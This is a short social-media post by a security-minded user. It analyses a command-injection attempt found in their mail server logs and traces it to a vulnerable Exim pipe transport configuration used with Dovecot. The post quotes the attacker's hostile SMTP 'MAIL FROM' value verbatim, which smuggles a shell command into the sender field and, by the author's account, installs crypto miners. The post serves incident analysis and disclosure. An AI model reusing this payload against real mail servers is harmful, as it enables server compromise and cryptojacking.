Found in my mail server logs:

MAIL FROM:<;for P in f W K 0 r S 5 T A u p 4 X E Q;do read;done;sh;exit 0;>

I guess thatā€™s a command line injection attempt, aiming at mail servers passing sender address to a spam filter application without escaping. It installs crypto miners.

After ruling out Postfix as the potential target here, I found that Exim configuration has a use_shell setting for the pipe transport. That seems to be the vulnerable configuration here, and there is an older advisory on it (2013). redteam-pentesting.de/en/advis

Follow

So my suspicion about misconfigured spam filtering being the target was obviously wrong. It was far more mundane: the proposed configuration for integrating Dovecot with Exim used to be vulnerable. IMHO it being possible to misconfigure in this way is already ridiculousā€¦

Ā· Ā· Web Ā· 0 Ā· 0 Ā· 1
Sign in to participate in the conversation
Infosec Exchange

A Mastodon instance for info/cyber security-minded people.